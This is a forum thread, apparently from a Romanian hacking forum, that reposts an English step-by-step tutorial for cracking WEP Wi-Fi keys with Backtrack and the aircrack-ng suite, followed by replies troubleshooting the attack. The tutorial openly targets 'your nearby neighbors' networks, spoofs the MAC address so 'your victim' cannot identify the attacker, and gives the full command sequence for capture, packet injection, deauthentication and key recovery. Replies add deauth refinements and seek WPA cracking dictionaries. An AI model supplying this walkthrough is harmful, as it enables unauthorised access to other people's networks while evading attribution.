How To Crack WEP using Backtrack w/Pictures

[Nytro]

How To Crack WEP using Backtrack w/Pictures

Author: Warlock

This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method.

Tinypic killed a couple of my images, I'm sure you can still manage to do it.

Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi.

What you need:

Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; Downloads

A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)

Patience

Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd.

First of all, before you do anything, navigate to the wireless assistant;

Start>Internet>Wireless Assistant

If you do not see any networks, then this will not work for you.

Open the konsole, which is here;

Now type, airmon-ng

It should show you your wireless card's info, like so;

Now type airmon-ng stop (your interface)

Should show you this;

Now type ifconfig (your interface) down

Then type macchanger --mac 00:11:22:33:44:55 (your interface)

This spoofs your mac address, so your victim cannot figure out who you are.

Type airodump-ng (your interface)

This will open up a new konsole.

Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks)

Open a new konsole

Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so;

It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.)

Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup.

Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface)

Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface)

Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C

Now type aircrack-ng -b (bssid) (filename-01.cap)

You have found the WEP key, mine being 77838557744334834238286364 (without the colons)

And you're done!

~Warlock

Sursa: LeetCoders

[SaNuFuri]

Salut, am o mica prb , rulez backtrack prin virtualbox in win , si prb e ca aduna greu data, a adunat 330 in 17 ore .. beacons sunt 530000+ ... de ce oare?

[wildchild]

probabil n-ai facut bine injectia sau chipset-ul nu este patchuit ca sa injecteze pachete cum trebuie.in orice caz, sansa sa aduni cat mai multe iti creste odata ce acel network lucreaza.daca vezi ca mac-ul victimei este conectat si foloseste internetul(poti folosi wireshark sa faci sniffing pe w ethernet), atunci este momentul cel mai prielnic sa aduni IVs

LE:in loc de ultimele 2 comenzi

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) & aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) 

eu foloseam mereu metoda personala pentru ca mergea mai bine asa

 aireplay-ng --arpreplay -e blabla -b bl:aa:aa:aa -h 00:11:12:13:14:0D mon0 & aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0

Edited June 8, 2011 by wildchild

[zenit]

Am incercat de mi-au sarit ochii, am lasat laptopul in jur de 8 ore sa colecteze pach-uri si degeaba, am depasit 20000 si tot cerea.

[sorelian]

Pe AP-ul ala cu WEP ,in alea 8 ore ,ai avut client asociat ?

Daca DA ,atunci in max 15 min trebuia sa ai cheia .

Daca NU ,atunci e mai greu...

Cateodata e nevoie chiar de peste 50000 de data (IVs)

Edited June 17, 2011 by sorelian

[lrdbilly]

pentru cei ce au #Data mic si creste greu sau nu creste deloc dupa ce dati comanda de asociere aireplay-ng -1 0 -a etc. si zice Association successfull dati aireplay-ng -1 -p 0841 -c FF:FF:FF:FF:FF:FF -b TARGET MAC PLACA WIRELESS (eg. wlan or mon).

cand a prins pachetul o sa trebuiasaca sa dati Y si #Data are trebui sa creasca considerabil. Aceasta comanda o sa reduca considerabil timpul de spargere a unei retele.

[alexis65]

poti folosi metoda si pe Linux...

[hammerfall]

poti folosi metoda si pe Linux...

Dracia dracului. Tu-ti dai seama? In plus tutorialul e facut pe BackTrack un sistem de operare ce nu are nici cea mai mica legatura cu Linux. [ironic]

[Românescu]

Am folosit pana acum backtrack5 si 4 pe vmware workstation 7.1.4 build-385536 si am windows7.

Am adaptor wireless Broadcom 802.11 pe laptop hp625.

Problema: nu-mi recunoaste adaptorul!! Am tot rascolit googleu pt raspunsuri si nimic clar. Acum mi se ia backtrack 3, si 2 nu mai gasesc pe nicaieri, probabil pe astea sa vrea.

Stie cineva de ce nu-l recunoaste? Trebuie instalate niste drivere specifice, copiezi dll-uri ?!?!

[MSn]

Am BT3 final.

Daca il mai cauti, da un PM.

[agstrato]

Salut. La cei care nu va merge bine luati-va o placa cu chipset Atheros . Un chipset care merge bine rau de tot este realtek rtl 8187 maj passwordurilor sunt de 11 sau de 13 (depinde in ce tara va aflati) si le scoate cam la 28000/35000 date. cheia poate fi scrisa in ascii sau nr de ex un 0 este defapt un 30. Am vazut mai sus la poze ca se skimba mac-ul si etc. Backtrack cat si restu de editii care fac wlanaudit(haxpuppy wifiway wifislax) nu mai trebuie skimbat nimik mac ii dai direct mon0 si ia macu placii automat. Ah si majoritatea au si un autoscript.sh ceva de genul asta daca nu va descurcati chiar are optiune sa aleaga si sa sparga singur. Ideea este oricat de lunga e parola (26) cu suficiente date tot il iei . Cateodata mai gastiti modemuri care se filtreaza altele pe care nu se asociaza si Canalul 13 nush daca o sa auziti pe cineva sa ia modem pe 13 ). La cei care nu va merge grafica la backtrack folositi screen. Iar am vazut mai sus ca cineva vb despre metoda reproducerii paketelor care nu este o idee chiar buna. pt ca poti prinde 1 paket nasol si sal reproduca la max degeaba ca defapt paketele sunt najpa. De ex in timp ce scanati daca vreti sa vedeti cateva ARP si cateva date luati tel cu wifi bagati o parola de 11 sau de 13 char si tot face date/ARP asta nu inseamna ca paketul este bun. Daca aveti tel cu android puteti cauta versiunea pt el: automatikwlan ii zice . si pt cei care stati in spania daca vreti sa invatati sa luati WPA va pot ajuta. Inca ceva folositor: toti vrem sa aflam unde se afla wlanurile astea sa le prindem mai bine etc si ne plimbam cu laptopu prin casa. Ei bine nu putem sti exact pozitia dar (exista un gps pt asa ceva dar e ceva cam scump) putem sti cand suntem mai aproape de modem sau mai departe. Va uitati ce gateway aveti deskideti 1 cmd si dati ping -t gatewayul vostru. Cu cat e mai mic cu atat sunteti mai aproape. Aici aveti o lista de adapters care intra in monitor mode sa nu va incurcati aiurea: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy

Edited September 22, 2011 by agstrato

[n00b_demivirus]

am obtinut si eu key-ul de la retea si nu stiu ce dreaq sa fac cu el. nu merge convertor ascii. o pot folosi undeva hexa? am win xp, key e A2:9B:83:C7:2B:82:CE:04:BE:F2:96:5C:A3

multumesc anticiipat

[DrPsychO]

"Open a new konsole

Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so; "

In cazul de mai sus file name e "hackforums" cred.

Ce e cu acel file? Ce trebuie sa contina?

[Nytro]

Cred ca acum e --channel in loc de -c.

In acel fisier se salveaza pachetele (nu intregi) necesare pentru spargerea parolei.

Nici eu nu stiu prea multe in acest domeniu, pune un nume de fisier, pe care sa il tii minte, il vei folosi cu aircrack.

[l34k]

Uneori problemele apar de la chipset. Cred ca cea mai buna alegere pentru NIC-ul wireless ar fi cel cu chipset intel.

[devacanta]

"Open a new konsole

Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so; "

In cazul de mai sus file name e "hackforums" cred.

Ce e cu acel file? Ce trebuie sa contina?

poti sa pui ce vrei la nume, acolo se salveaza pachetele receptionate de airodumo-ng , iti trebuie pentru aircrack-ng

uite aici si un video tutorial :

[DrPsychO]

mc (:

care e diferenta intre 3 si 5? pe site-ul lor am vazut ca se poate downloada 5 si 5 R1

Este vreo dif intre 3 si 5?

[Nytro]

Sunt diferente:

- versiunea de kernel si driverele pentru placile de retea suportate

- patch-urile pentru drivere ca sa suporte packet injection (sau cum se cheama)

- versiunile de airmon/aircrack... pe langa celelalte utilitare

Deci, cel putin in teorie, 5 ar trebui sa aiba multe plusuri fata de 3.

PS: Aceste diferente nu prea sunt "vizibile" de obicei, poate doar sa folosesti --channel in loc de -c.

[co4ie]

Depinde de comanda pe care o dai ... la airmon-ng trebuie --channel , la airodump-ng merge -c !!

Plusurile nu sunt decat daca ai backtrack 3 fara update-uri ... daca faci update la aircrack in backtrack 3 va fi acelasi cu cel din backtrack 5 ! Oricum singurile schimbari sunt update-urile la driverele de injectie de pachete , comenzile sunt aceleasi iar daca ai vreo nedumerire poti da aricrack-ng --help sau RTFM !!

[DrPsychO]

din cate am inteles balanta se inclina inspre GNOME fiind mai accesibil [KDE fiind putin mai complicat/complex],KDE ar avea ceva mai multe buguri dar o grafica mai atragatoare.

Pentru cei care l-au folosit la WEP crack, ce imi recomandati?

Nytro : Mc mult pentru ajutor si sugestii (:

[co4ie]

Eu folosesc KDE ...

Cel mai bine le incerci pe amandoua... cu care te intelegi mai bine cu ala lucrezi in continuare ! Comenzile difera de la unul la altul dar nu cred ca asta ar fi o problema !!

[adonisslanic]

Lol fratilor, nu conteaza desktop enviromentul!!!! E doar o chestie de preferinta <(T^T)> nu are nicio legatura cu functionalitatea programelor gen suita aircrack-ng O_O Tot in consola o sa lucrati in orice desktop env. D-asta s-au si pus mai multe "arome" la Backtrack odata cu a cincea iteratie a acestei distributii....

[co4ie]

Lol fratilor, nu conteaza desktop enviromentul!!!! E doar o chestie de preferinta <(T^T)> nu are nicio legatura cu functionalitatea programelor gen suita aircrack-ng O_O Tot in consola o sa lucrati in orice desktop env. D-asta s-au si pus mai multe "arome" la Backtrack odata cu a cincea iteratie a acestei distributii....

nu ai vazut ce am scris mai sus? sa le incerce pe amandoua si sa se decida singur... fiecare dupoa preferinte ...

[Mircea88]

are cineva un dictionar wpa romanesc? dar nu de 7gb...sa stau 'nspe mii de ore..

[Ellimist]

E vreo sansa sa spargi asa parola WEP de la un router din ala de la romtelecom care e ceva de genul :J45HK3FSIFU3NJ2NM3 ?